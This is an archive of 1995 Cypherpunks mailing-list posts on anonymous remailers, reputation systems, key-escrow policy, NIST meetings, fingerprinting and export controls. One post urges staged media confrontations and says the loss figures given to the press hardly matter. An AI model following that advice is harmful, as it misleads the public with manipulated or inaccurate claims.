TITLE: 11th Annual Computer Security Applications Conference LOCATION: New Orleans, LA SPONSOR: Applied Computer Security Associates CONTACT: Ann Marmor-Squires ADDRESS: TRW Systems Division CITY_ST: Fairfax, VA 22033 PHONE: (703) 803-5503 DATE: 05/15/97 TITLE: Security and Audit Oracle LOCATION: Washington, D.C. SPONSOR: MIS & Dept. of Justice CONTACT: Pat Ciuffreda ADDRESS: CTTS/IRM/JMD, Room 1211-ARB CITY_ST: Washington, DC 20530 PHONE: (202) 616-2018 From raph at CS.Berkeley.EDU Mon Sep 11 06:50:45 1995 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Mon, 11 Sep 95 06:50:45 PDT Subject: List of reliable remailers Message-ID: <199509111350.GAA28685@kiwi.cs.berkeley.edu> I operate a remailer pinging service which collects detailed information about remailer features and reliability. To use it, just finger remailer-list at kiwi.cs.berkeley.edu There is also a Web version of the same information, plus lots of interesting links to remailer-related resources, at: http://www.cs.berkeley.edu/~raph/remailer-list.html This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail, which is available at: ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33.tar.gz For the PGP public keys of the remailers, as well as some help on how to use them, finger remailer.help.all at chaos.taylored.com This is the current info: REMAILER LIST This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu. $remailer{"extropia"} = " cpunk pgp special"; $remailer{"portal"} = " cpunk pgp hash"; $remailer{"alumni"} = " cpunk pgp hash"; $remailer{"bsu-cs"} = " cpunk hash ksub"; $remailer{"c2"} = " eric pgp hash reord"; $remailer{"ideath"} = " cpunk hash ksub reord"; $remailer{"hacktic"} = " cpunk mix pgp hash latent cut post ek"; $remailer{"flame"} = " cpunk mix pgp. hash latent cut post ek reord"; $remailer{"rahul"} = " cpunk pgp hash filter"; $remailer{"mix"} = " cpunk mix pgp hash latent cut ek ksub reord"; $remailer{"syrinx"} = " cpunk pgp hash cut reord mix post"; $remailer{"ford"} = " cpunk pgp hash ksub"; $remailer{"hroller"} = " cpunk pgp hash mix cut ek"; $remailer{"vishnu"} = " cpunk mix pgp hash latent cut ek ksub reord"; $remailer{"crown"} = " cpunk pgp hash latent cut mix ek reord"; $remailer{"robo"} = " cpunk hash mix"; $remailer{"replay"} = " cpunk mix pgp hash latent cut post ek"; $remailer{"spook"} = " cpunk mix pgp hash latent cut ek reord"; $remailer{"gondolin"} = " cpunk mix hash latent cut ek ksub reord"; $remailer{"rmadillo"} = " mix cpunk pgp hash latent cut"; $remailer{"ncognito"} = " cpunk"; $remailer{"precip"} = " cpunk mix pgp hash latent cut ek"; catalyst at netcom.com is _not_ a remailer. lmccarth at ducie.cs.umass.edu is _not_ a remailer. usura at replay.com is _not_ a remailer. Use "premail -getkeys pgpkeys at kiwi.cs.berkeley.edu" to get PGP keys for the remailers. Fingering this address works too. Note: penet is *down* for a few days. Check back here for updates. Last ping: Mon 11 Sep 95 4:00:27 PDT remailer email address history latency uptime ----------------------------------------------------------------------- alumni hal at alumni.caltech.edu *--****+**+* 9:23 99.99% hacktic remailer at utopia.hacktic.nl *****+****+* 12:51 99.99% hroller hroller at c2.org **********+* 7:48 99.99% syrinx syrinx at c2.org ------++-++* 1:16:52 99.99% c2 remail at c2.org +++++++++++* 39:22 99.99% flame remailer at flame.alias.net ++++++*-+*+* 1:20:26 99.99% spook remailer at spook.alias.net --.--+----- 3:55:18 99.99% bsu-cs nowhere at bsu-cs.bsu.edu ***-******+* 13:02 99.98% replay remailer at replay.com *****+****+* 15:04 99.93% ideath remailer at ideath.goldenbear.com ----.---+--- 3:51:00 99.83% ncognito ncognito at gate.net * ** ****++* 7:04 99.08% rmadillo remailer at armadillo.com ++ + *+++*++ 54:25 99.06% precip mixmaster at mix.precipice.com 52:55 99.07% ford remailer at bi-node.zerberus.de **********+* 5:54 98.82% crown mixmaster at kether.alias.net -- ---+--+-- 3:32:46 98.04% extropia remail at extropia.wimsey.com _---.- -..- 12:48:37 97.01% portal hfinney at shell.portal.com **** *+ *+* 5:57 96.81% vishnu mixmaster at vishnu.alias.net ---------+* 4:59:22 96.27% robo robo at c2.org **********+* 11:03 95.95% rahul homer at rahul.net +*+*******+* 6:52 99.99% gondolin mixmaster at gondolin.org -- . -+*--. 6:29:14 89.70% mix mixmaster at remail.obscura.com ---+---___. 15:25:37 87.63% For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html History key * # response in less than 5 minutes. * * response in less than 1 hour. * + response in less than 4 hours. * - response in less than 24 hours. * . response in more than 1 day. * _ response came back too late (more than 2 days). cpunk A major class of remailers. Supports Request-Remailing-To: field. eric A variant of the cpunk style. Uses Anon-Send-To: instead. penet The third class of remailers (at least for right now). Uses X-Anon-To: in the header. pgp Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID. hash Supports ## pasting, so anything can be put into the headers of outgoing messages. ksub Remailer always kills subject header, even in non-pgp mode. nsub Remailer always preserves subject header, even in pgp mode. latent Supports Matt Ghio's Latent-Time: option. cut Supports Matt Ghio's Cutmarks: option. post Post to Usenet using Post-To: or Anon-Post-To: header. ek Encrypt responses in reply blocks using Encrypt-Key: header. special Accepts only pgp encrypted messages. mix Can accept messages in Mixmaster format. reord Attempts to foil traffic analysis by reordering messages. Note: I'm relying on the word of the remailer operator here, and haven't verified the reord info myself. mon Remailer has been known to monitor contents of private email. filter Remailer has been known to filter messages based on content. If not listed in conjunction with mon, then only messages destined for public forums are subject to filtering. Raph Levien From rah at shipwright.com Mon Sep 11 07:12:59 1995 From: rah at shipwright.com (Robert Hettinga) Date: Mon, 11 Sep 95 07:12:59 PDT Subject: e$: Progress and Freedom Conference this Summer Message-ID: There was a pointer here to an article in the NYT or WSJ about the conference this summer of the Progress and Freedom Foundation, with muchos net.luminarios (Huber, Myhrvold, Barlow, Brand, Kelly, Dyson, Keyworth, etc.) in attendence. Topics were mostly about e$ and the causes/consequences thereof. I just saw this thing on CSPAN, and I thought it was way cool. Here's how to get it from CSPAN in case they don't run it again. Ask for Tape number 57759-63 CSPAN prices their tapes by the hour, at $35/hr. This tape is $105.00 CSPAN Department 53 Washington, DC 20055 In case I botched something above, or you want to put this on your favorite book-entry transaction account ;-), CSPAN's phone number is 202-737-3220 and ask for Viewer's Services. Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From reagle at rpcp.mit.edu Mon Sep 11 07:13:08 1995 From: reagle at rpcp.mit.edu (Joseph M. Reagle Jr.) Date: Mon, 11 Sep 95 07:13:08 PDT Subject: question about reputation Message-ID: <9509111414.AA29512@rpcp.mit.edu> At 03:32 PM 9/10/95 -0700, Wei Dai wrote: >For example, Alice starts a anonymous consulting service, and announces >that she will answer the first ten queries for free. Upon hearing this, >Mallet immediately starts another consulting service, and announces the >same offer. At this point Mallet can simply forward his customers' >queries to Alice and Alice's answers back to his customers. Thus, he gains >reputation at no cost. As a response to this example. I'd argue Mallet has less of a reputation because: (1) if this example applies to the first 10 questions from each person, Alice will answer many more questions that Mallet. (Mallet answers 10 and is done.) (2) if this example means the first 10 questions from anywhere Mallet than has to arrange to have his customer's 10 questions in the queue and ready to go before any other person can get in the queue, which is some work. In general, I'd think reputation is akin to brand name to a degree. Differentiation! So, if Alice notices people tracking her "reputation advertising" she can change it. Reputation might not be as static a concept as we think (as others have mentioned by bringing up arbitrage.) ------------------------- Regards, Joseph M. Reagle Jr. http://farnsworth.mit.edu/~reagle/home.html reagle at mit.edu 0C 69 D4 E8 F2 70 24 33 B4 5E 5E EC 35 E6 FB 88 From sdw at lig.net Mon Sep 11 07:42:06 1995 From: sdw at lig.net (Stephen D. Williams) Date: Mon, 11 Sep 95 07:42:06 PDT Subject: Clinton's Black Helicopters Over My House! In-Reply-To: Message-ID: > > ObConspiracy content: high. > > They are coming to take me away, take me away! > > Clinton's black helicopters are swooping low over my house. > > What should I do? ... > --Tim May > > ---------:---------:---------:---------:---------:---------:---------:---- > Timothy C. May | Crypto Anarchy: encryption, digital money, > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > Corralitos, CA | knowledge, reputations, information markets, > Higher Power: 2^756839 | black markets, collapse of governments. > "National borders are just speed bumps on the information superhighway." About a month ago I walked by California Pizza Kitchen just south of Dupont circle and Clinton was there eating with his family in a full restaurant... Too bad I didn't have my RSA T-shirt yet... BTW, I sent money ages ago. My 'Cypherpunk Criminal' shirt is just about worn out. sdw -- Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw at lig.net http://www.lig.net/sdw Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011 OO/Unix/Comm/NN ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95 From jim at rand.org Mon Sep 11 08:27:50 1995 From: jim at rand.org (Jim Gillogly) Date: Mon, 11 Sep 95 08:27:50 PDT Subject: Clipper: the definitive meme Message-ID: <199509111526.IAA17504@mycroft.rand.org> T-shirt!! T-shirt!! Jim Gillogly Trewesday, 20 Halimath S.R. 1995, 15:26 ------- Forwarded Message From: wtshaw at aol.com (WTShaw) Newsgroups: talk.politics.crypto Subject: Re: Impressions of the NIST meeting Date: 11 Sep 1995 04:50:27 -0400 In the world of Jet-Age crypto, the government offers up a biplane, and seek to reserve the second seat for themselves. ------- End of Forwarded Message From lwp at mail.msen.com Mon Sep 11 09:10:34 1995 From: lwp at mail.msen.com (Lou Poppler) Date: Mon, 11 Sep 95 09:10:34 PDT Subject: Brian Davis' cypherpunk GAK proposal In-Reply-To: Message-ID: On Sun, 3 Sep 1995 21:25:26 -0400 (EDT), Brian Davis wrote: } } I, of course, know of the "dislike" of GAK here. I am curious to know, } however, if the "dislike" is because government would have access under } any circumstances or if the primary worry is that government will cheat } and get access when most would agree that they shouldn't (either by the } judge "cheating" or a TLA stealing it). You leave out something here when you say `the judge "cheating"'. Most of the proposals and draft legislation include words like "or by other lawful authority" along with the provisions empowering judges to grant access to keys. Some versions will list various combinations of the Attorney General, Director of {TLA}, etc, as explicitly empowered. Other versions don't explicate the phrase, perhaps trusting that those with the need will already know where their lawful authority lies -- maybe in an anti-terrorist Executive Order; maybe in legislation authorizing military support in drug interdiction; perhaps in their organization's charter to protect "national security". Part of the concern is that spooks will have routine access to keys without any cheating -- no stealing or bent judges will be required. The War on Drugs, the War on Firearms, the War on Terrorists (on Money Lauderers, on Pedophiles, on Spies) are just too important. } In other words ... if it took agreement by a review board composed of } non-LEA members of this list, would the escrow be acceptable?? This would not be acceptable to the government. Very many sincere, patriotic government agents believe they currently have the right and the responsibility to monitor the civilians' possibly-illegal activities. Your hypothetical review board of cypherpunks would unacceptably limit their established right to gather evidence and intelligence. Investigations too sensitive to mention here, would be crippled. Unless of course, you intended that "or by other lawful authority" would be included in your scheme? :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :: Lou Poppler | "Understanding is a three-edged :: :: http://www.msen.com/~lwp/ | sword..."-- Ambassador Kosh, Babylon5:: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: From jya at pipeline.com Mon Sep 11 09:13:23 1995 From: jya at pipeline.com (John Young) Date: Mon, 11 Sep 95 09:13:23 PDT Subject: VER_tgo Message-ID: <199509111613.MAA02185@pipe1.nyc.pipeline.com> 9-11-95. W$Japer: "VeriFone Expected to Announce System For Purchasing Goods on the Internet." VeriFone, Inc., which manufactures terminals through which merchants scan consumers' credit cards for authorization, said it will provide merchants who wish to market goods on the global computer network with a complete set of tools to handle electronic cash, electronic checks and credit-card payments. The system consists of four different products: A consumer would use the software equivalent of a wallet, which could include different forms of payment, such as electronic checks, cash, or credit cards to purchase goods. The consumer would also use a smartcard inserted in a device connected to a PC to verify his identity. The card would also contain other cardholder information and eventually could include electronic cash. Philips and Oracle Plan Electronic Mail Without Use of PCs Philips Electronics NV and Oracle Corp. plan to offer electronic mail without personal computers, using Philips phones that have small display screens and keyboards. Gerrit Schipper, president of Philips Home Services, said the new e-mail service was designed to increase the services' value and appeal to the 70% of U.S. households that don't have PCs. 2 go: VER_tgo (5 kb) From tcmay at got.net Mon Sep 11 09:44:42 1995 From: tcmay at got.net (Timothy C. May) Date: Mon, 11 Sep 95 09:44:42 PDT Subject: question about reputation Message-ID: How reputation systems work is an important issue. I hope we can discuss it further. At 10:32 PM 9/10/95, Wei Dai wrote: >In an economy based on positive reputations, how does one acquire a >reputation capital? One way may be to initially perform services at a >price below cost, but this has some problems. > >For example, Alice starts a anonymous consulting service, and announces >that she will answer the first ten queries for free. Upon hearing this, >Mallet immediately starts another consulting service, and announces the >same offer. At this point Mallet can simply forward his customers' >queries to Alice and Alice's answers back to his customers. Thus, he gains >reputation at no cost. > >On the other hand, this "man-in-the-middle" attack can also work against >conventional True Name based services, but perhaps with less effect. Has >anyone ever heard of this being done? This line of reasoning is a variant of the "Chess Grandmaster" scheme, wherein one gains the reputation of a chess grandmaster by echoing the moves of a chess grandmaster playing in another game. I believe this is described in various crypto books, but I haven't looked it up here. In practice, nothing so simple as an "Ask any 10 questions" would be a practical way to gain reputation. If Alice is trying to build up a rep, she'll choose her customers with some care, or make sure that alternate channels also exist. >Is there a better way to acquire a good reputation? Directly contacting a larger group, such as this list, is usually a faster and better way to build a reputation than in, say, answering only questions directly made. Admittedly, many consulting cases involve direct contacts. However, the reputation of a Pr0duct Cypher, or a Black Unicorn, or a Tim May, or a Wei Dai, is usually made in a public forum, not primarily in one-on-one contacts. While not all of us sign our posts, the principal is roughly the same: we are communicating directly, so man-in-the-middle attacks, or "Chess Grandmaster" attacks, are fairly ineffective. And practically speaking, if someone hires _me_ as a consultant, it is probably based on past achievements, through multiple channels. This would apply to digital pseudonyms as well, though not as directly. (Humorous Sidenote: an informal variant of the Chess Grandmaster approach is to use the best arguments found on one list on _another_ list. Another variant, widely used, is to adopt the best arguments of others and use them one's self (oneself?). This is how memes spread, and is central to the advancement of knowledge.) --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From clewton at netcom.com Mon Sep 11 09:53:47 1995 From: clewton at netcom.com (Charles Lewton) Date: Mon, 11 Sep 95 09:53:47 PDT Subject: e$: Progress and Freedom Conference this Summer In-Reply-To: Message-ID: On Mon, 11 Sep 1995, Robert Hettinga wrote: > > I just saw this thing on CSPAN, and I thought it was way cool. Here's how > to get it from CSPAN in case they don't run it again. > > Cheers, > Bob Hettinga During the program, which was *very* interesting, it was announced by CSPAN that they would carry the remainder of the meeting next Sunday Sept. 17. Check w/them for the time locally. Chuck Lewton Redmond, WA From frissell at panix.com Mon Sep 11 09:58:16 1995 From: frissell at panix.com (Duncan Frissell) Date: Mon, 11 Sep 95 09:58:16 PDT Subject: NYT on GAK Message-ID: <199509111516.LAA11450@panix.com> > "If this fails," said a figure familiar with the > Administration's thinking on the proposed change in > cryptographic policy, "it's going to lead to a very > divisive debate. And the irony, for libertarians who oppose > key escrow, is that if it fails, I am convinced that Louis > Freeh cannot be true to his job without proposing domestic > controls on data encryption." > > "He's not going to give up without a fight, and neither is > the Justice Department," said the figure, who spoke on the > condition he not be identified. It worked during WWII but will it work now? After all, locking up Japanese Americans worked during WWII, but would not work now. Note that the NSA abandoned their "born secret" stance on cryptographic technology when it became impossible to sustain. And when R, S, & A together with MIT decided to publish "A Proposal for a Public Key Encryption System" in spite of NSA threats, the Agency folded. That represented a genuine surrender. We'll see if Louis has more balls than the NSA did. Widespread resistance is likely. Court tests will be entertaining. At this point in the discussion, someone always pipes up and says that even if cypherpunks fail to obey a crypto ban, businesses will fall into line like the good sheep they are. This prediction ignores some important facts about modern businesses. First, many small businesses already routinely ignore government mandates in hiring, the use of independent contractors, environmental regulation, and taxation. These entities can be counted upon to resist crypto controls as well (if they feel like using crypto0. Second, a growing number of businesses are headed by explicit libertarians or right wing nuts. These people have already engaged in a lot of resistance to crypto regulation and can be counted on for more resistance. Additionally, if strong crypto confers a competitive advantage on users, use will be encouraged. Does anyone have a handle on exactly how a crypto ban would be carried out. would regulation (if so, which ones) or legislation be used? The exact details will make a big difference in considering avoidance strategies. DCF "Blatant Advertisement --- If anyone needs someone to string 'words in a line' for them, my services are available." From adam at bwh.harvard.edu Mon Sep 11 10:13:49 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Mon, 11 Sep 95 10:13:49 PDT Subject: NYT on GAK In-Reply-To: <199509111316.JAA02859@pipe2.nyc.pipeline.com> Message-ID: <199509111713.NAA06281@bwh.harvard.edu> Its a good thing the administration only wants to outlaw cryptography, not anonymity. Adam | The New York Times, September 11, 1995, p. D7. | | | Technology / Peter H. Lewis [...] | "If this fails," said a figure familiar with the | Administration's thinking on the proposed change in | cryptographic policy, "it's going to lead to a very | divisive debate. And the irony, for libertarians who oppose | key escrow, is that if it fails, I am convinced that Louis | Freeh cannot be true to his job without proposing domestic | controls on data encryption." | | "He's not going to give up without a fight, and neither is | the Justice Department," said the figure, who spoke on the | condition he not be identified. -- "It is seldom that liberty of any kind is lost all at once." -Hume From jya at pipeline.com Mon Sep 11 11:22:01 1995 From: jya at pipeline.com (John Young) Date: Mon, 11 Sep 95 11:22:01 PDT Subject: NIST Hat Tricks Message-ID: <199509111719.NAA08676@pipe1.nyc.pipeline.com> Pat, A response to the quote below from your NIST Key Escrow web site: I got the full Discussion Paper #4 with all ten criteria from the main desk, along with others that seemed to be appearing as the day passed. (I'll fax a copies of any of the handouts to anyone wanting hardcopy. We scanned all handouts.) In breakout session B-2, we were also given only that part of Paper #4 that dealt with our session's criteria 3, 4 and 9. It was passed out at the end of the meeting after discussion had ceased. We did not get a chance to discuss the "example potential solutions." Strange procedure: it seemed as if NIST was sleight-of-handing prepared backup papers as if they anticipated resistance. Maybe there would have been more concessions or more rabbits pulled from the KE hat if there had been even louder "brrrrat-GAK." Never too late to ask for those other trapped bunnies. ---------- [Excerpt from Pat's web site]: * During the first breakout session, in the technical discussion of criteria # 5 and #6, an authorless (presumably government issued) "Example Potential Solutions" paper was distributed. It caused a lot of grumbling amongst the attendees, as they were supposed to discuss it, without any prior chance to read or react to it. Here are two versions of it, First, Anonymous Sample Solutions (HTML by PDF) and a simple ASCII version Sample Solutions (ASCII text by John Young) I have not seen an electronic version of the paper that I received. It contains the following paragraph: "Example Solutions to export criteria 5 and 6 are indentified below to help give a better feel for approaches that implementors may take to satisfy the criteria. The information in this paper is not intended to represent fail-sfe, cookie cutter solutions to the criteria, but only to generate more detailed discussions." It is also interesting to note that John Young has an electronic document with all of the sample solutions (a solution for each of the ten criteria. I never saw a paper document with all ten solutions. The one that was handed to me had only two criteria, #5 and #6. I talked to attendees of other breakouts, and they had received nothing. From JonathanZ at consensus.com Mon Sep 11 12:36:58 1995 From: JonathanZ at consensus.com (Jonathan Zamick) Date: Mon, 11 Sep 95 12:36:58 PDT Subject: question about reputation Message-ID: Actually about a year ago I was working on a project to help merge electronic tokens and 'reputation'. The idea was to reinforce contributions to the net and acknowledge them in a tangible manner The classic method of gauging respect has become more difficult as the growth of the net has resutlted in a surfeit of citizens who simply haven't learned the idea of contribution and net community, nor how to judge the level of respect that others have. We'd seed a certain # of tokens amongst FAQ maintainers, moderators, and those who are active in helping on lists and forums. A group would be chosen to help decide how to split up the seed tokens. This group would not be eligible for any tokens themselves (they'd be selected from those we felt were the most active, oddly they'd be earning old style respect, that is contributing their time in distributing tokens without being able to earn any.) Still under discussion was how to bring more tokens into the system. One was to continue to distribute tokens based on a standard for certain actions and further nominations as judged by the council (which would change membership itself over time.) The second was to have an actual foundation set up to accept contributions to be distributed to other net related non-profits. Thus for those who don't have the time or knowledge base to contribute to the net, they can actually contribute money to aid net-related groups. The tokens could be exchanged when people answer questions, as favors. Part of the money from the foundation would be to have gatherings which would 'cost' tokens, so those who have put in their time and labor could mix and listen to speakers, enjoy a nice dinner, etc. Anyway, just interesting to see the topic come up now in the Cypherpunk community. At the time, there were still some barriers between the objectives we were given by different people paying our own checks on the matter. Perhaps the idea of 'Friends of the Net' is now more pertinent. Feel free to drop me some email or cc back to the list. If enough people are interested, I'll look into the subject again. Jonathan ------------------------------------------------------------------------ ..Jonathan Zamick Consensus Development Corporation.. .. 1563 Solano Ave, #355.. .. Berkeley, CA 94707-2116.. .. o510/559-1500 f510/559-1505.. ..Mosaic/WWW Home Page: .. .. Consensus Home Page .. From cman at communities.com Mon Sep 11 13:15:16 1995 From: cman at communities.com (Douglas Barnes) Date: Mon, 11 Sep 95 13:15:16 PDT Subject: Digital Fingerprinting Message-ID: Hal Finney writes: >I'm not sure how to do it for software, but for novels it should be easy >to fingerprint. Every couple of pages the author writes a sentence twice >in different forms. This would not take a great deal of extra effort on >the part of the author. Software can then choose from the alternative >variations in different patterns to produce a unique fingerprint for >every copy. > One of the points that I'm exploring is "what kind of transformation makes for an un-fuzzable fingerprint bit." This example seems to fall into the same bin as the "two cameras" approach; the two sentences come out of the author's head in the same way that the two cameras are pointed at the same piece of reality. >There would seem to be two approaches to removing the fingerprint. >One would be re-writing every sentence in the novel. The other would be >to collect enough copies to identify all of the sentences which have >variations. Most of the mathematics of fingerprinting research is >oriented around figuring out how many different points of variation there >must be to be secure against a certain number of copies of the >fingerprinted item being compared. Right. All of these approaches, however, assume unforgeable bits, either by obscurity of insertion, or by means that are analagous to the "two cameras" approach. I'm trying to come up with a robust definition of "two cameras-ness", any suggestions appreciated. > >Perhaps a similar approach could be applied to software, where in many >cases a couple of statements could be trivially interchanged, or other >kinds of simple transformations could be manually generated. Those >could be marked by the programmers without too much extra work. > The problem with changes like this is that if they're trivial enough not to require retesting, etc., then once hackers know the accepted range of modification, they can completely fuzz them up. Various other schemes such as reordering object modules fall into this as well. The problem with software is that it can be reverse-compiled, then compiled again. Unless you're willing to define a series of branches that really do different things (and are not so trivial to be expressed as algorithmic variants), then bits can be fuzzed. If you _do_ write these branches, you are in for a rough time when it comes time to do quality assurance on your software. From vznuri at netcom.com Mon Sep 11 13:39:37 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Mon, 11 Sep 95 13:39:37 PDT Subject: crypto confrontation Message-ID: <199509112036.NAA10670@netcom13.netcom.com> regarding the NIST policies on cryptography being shaped at this moment, an idea occurred to me. one of the most important aspects of protest is getting the public to be on your side. right now the american public is pretty indifferent about the cryptography issue, but there could be some very graphic situations that would help bring it out into the limelight even more than it is at the moment, and make anyone promoting government key escrow seem like the bad guys. the minor protest going on with the Perl t-shirts is really fantastic (last count, ~700 shirts out the door), but what really brings an issue to the forefront of american consciousness (i.e. the media) is *confrontation*. picketers in front of buildings clashing with police is almost guaranteed to get a little media coverage, almost no matter what the issue. now, some day we might reach this point with crypto rights. it would be quite a spectacle. (I'm sure people would argue against it here, but IMHO even a simple demonstration of a few dozen people might do more for widespread public consciousness of the issue than a million lines of code on an FTP site..) -- in the meantime here's another possibility: suppose that a software company intentionally set up a situation where they are exporting a cryptographic algorithm out of the country. and they have filming crews on hand when the bad-guy customs agents or whoever stop the truck at the border and confiscate the software. have the reporters asking questions like "why are you confiscating this"? "answer: this is classified a munition". this could really be a fantastic segment for Hard Copy or any of the other trashy tabloid shows. just a confrontration for confrontation's sake, with nothing resolved, just a lot of people pissed off at each other, and the end result the viewer coming away saying, "what a disgrace!! somebody should do something!!" I mean, imagine a segment where you see the customs officers pointing guns at a truck driver or whatever (that would *really* be optimal), and them breaking into the truck to pull out the software. the reporter could say, "what's so deadly that's in the box??" and pull out a computer disk. sound bites of people outside the country saying how they want to use the crypto. a nice businessman in a tie, in the middle of an office with hardworking suits and ties. "we're not criminals!! we're trying to *protect* ourselves from criminals!! but your government won't let us!!" other sound bites: joe sixpack goes and buys crypto package from Germany because he doesn't have to put up with illegality and uncle sam. shots of massive Microsoft and an executive or programmer complaining how they can't put the code they want to in their programs, that users *want*, that would solve these horrible hacker problems that the country is having, because uncle sam is interfering. other scenes: businessmen calculating how much the U.S. software market (which, BTW, we are premiere in the world in) has already lost in sales, or could potentially lose on the information highway. "my company personally had [x] ready but could not release it. [y] was delayed [z] years for approval. we estimate we have lost [a] and have had to hold off hiring as much as [b] people". (the actual numbers should be as close to reality as possible, but from a PR point of view don't even matter!!) much made of how the Internet committees are now ignoring the US recommendations that require escrowed crypto. "the U.S. may ironically become only a inconsequential rest stop on the information superhighway of the future" much FUD about how the US could become a "backwater in cyberspace" because of these policies. etc!! lots of hype about how cyberspace will become the very basis of future global economies, and that anybody who opts out will be slitting their own throat. also, crypto being absolutely essential to secure transactions. in fact, if we play this right we could even get a new kind of semi-conventional wisdom into that easily-manipulated thing called the public consciousness: "hackers can be foiled by good crypto. the government is killing good crypto. therefore hackers are proliferating because of the government!!" plus, you could throw in the Phil Zimmermann thing too, although that might be overdoing it. as for all the bill of rights angle and those kinds of things, those could be put in there, but remember that people generally hate lawyers -- actually, I'm actually rooting for PRZ to be indicted. an acquittal would be extremely costly, but it could really bring the key issues to the forefront of the american or even world consciousness. hell, it would beat the OJ trial any day in my book!! and in fact it might be just the ticket to the kind of mainstream journalism that could really tip the balance of public opinion. (the press is pretty sleazy, I admit, but it is a *monster* machine that one might be able to trick into working for you!! in fact, I would consider that quite the ultimate hack in social engineering!! any weenie hacker can con a phone repairman, but can you trick the whole U.S. media system into telling the public what you want it to hear? sounds like a real challenge to me!!) and BTW, I am aware of how DJBernstein and others have various lawsuits and FOIAs against the government. but I don't think these are really penetrating Joe Sixpack's brain, when that is really where the battle lies. and Joe Sixpack doesn't understand esoteric things like the bill of rights, the constitution etc.-- but he does understand pictures of police confronting someone who doesn't seem to be doing anything wrong and is arguing in favor of something good for america. you might think, "what does public opinion have to do with government?" answer: a lot. if in a public poll, a large majority were in favor of releasing crypto regulation, you can bet that the "which way is the wind blowing NOW?!?!?!" politicians (that is, all of them, ) would be scrambling to appease the public. even Clinton has a long record of merely going with what is politically expedient. I can fully imagine him defying key law-enforcement agencies if the public was more in support of good crypto. and, if we can get scenes like what I'm talking about, that day may become a reality. I continue to believe that the way to really hammer the issue and get what we want may amount to a kind of "psychological terrorism": "propaganda" on television that promotes our cause to joe sixpack, and simply honestly tells what is at stake. (that's the beauty of our position, is that even the simple truth is very powerful propaganda-- in fact that's how you can generally tell if you are on a side that is likely to win in the long run!!). there are many here who will argue for less confrontational approaches, about not getting anyone upset, about not trying to paint anyone as a bad guy, about just opting out of a "hopeless" political process, about how the whole US system is so screwed up anyway that we're all pretty much screwed when it comes down to it, etc. ad nauseaum, ... but IMHO a pound of nonconfrontration is worth a feather of confrontation in the long run. and I continue to believe the confrontation, while a bit messy and unpleasant at times, will really get the ultimate result that we want: (1) widespread public consciousness on the issue, (2) widespread support of our side. again, the code distribution is great, but in the long term, I continue to believe that public opinion is ultimately what runs a government, and a tyrannical government cannot exist without the tacit support of the population. I applaud the Perl t-shirt sellers for their great victory but suggest that greater victories lie in waiting. how about a demonstration of a bunch of people wearing the shirts, for starters? --Vlad Nuri From pfarrell at netcom.com Mon Sep 11 13:54:22 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Mon, 11 Sep 95 13:54:22 PDT Subject: More NIST presentations available Message-ID: <199509112050.NAA11447@netcom3.netcom.com> I've collected more presentations and comments for last week's NIST GAK meeting. I've got CDT's presentation and new policy response, VTW's presentation, and David Lesher's post from talk.politics.crypto. htpp://www.isse.gmu.edu/~pfarrell/nistmeeting.html is the starting point. If you seem more, please forward it to me. Thanks Pat Pat Farrell grad student http://www.isse.gmu.edu/students/pfarrell Infor. Systems and Software Engineering, George Mason University, Fairfax, VA PGP key available via finger or request #include standard.disclaimer From tka at brutus.bright.net Mon Sep 11 14:13:08 1995 From: tka at brutus.bright.net (Todd Ackman) Date: Mon, 11 Sep 95 14:13:08 PDT Subject: itar question Message-ID: Hi. please excuse if this is an inappropriate place to ask this, but what the hell... If I create a set of patches to a PD or GNU software package (i.e. telnetd, httpd) to support encryption (in particular SSL), can i put the patches up on an ftp site, Or would i be in violation of itar, and therefore risk getting hauled off by the feds? (i'm a us citizen living/working in the states). Thanks. -TA From stewarts at ix.netcom.com Mon Sep 11 14:49:31 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 11 Sep 95 14:49:31 PDT Subject: question about reputation Message-ID: <199509112148.OAA08494@ix4.ix.netcom.com> At 09:53 AM 9/11/95 -0700, Tim wrote: >(Humorous Sidenote: an informal variant of the Chess Grandmaster approach >is to use the best arguments found on one list on _another_ list. Another >variant, widely used, is to adopt the best arguments of others and use them >one's self (oneself?). This is how memes spread, and is central to the >advancement of knowledge.) John Young uses this approach, quite effectively; his source lists are the New Yawk Times and Wall Street Journal, and the reputation he's built by forwarding the material has been quite good, in spite of the dubious sources of his information :-) #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From stewarts at ix.netcom.com Mon Sep 11 15:17:43 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 11 Sep 95 15:17:43 PDT Subject: itar question Message-ID: <199509112217.PAA14304@ix4.ix.netcom.com> At 05:08 PM 9/11/95 -0400, you wrote: >If I create a set of patches to a PD or GNU software package (i.e. telnetd, >httpd) to support encryption 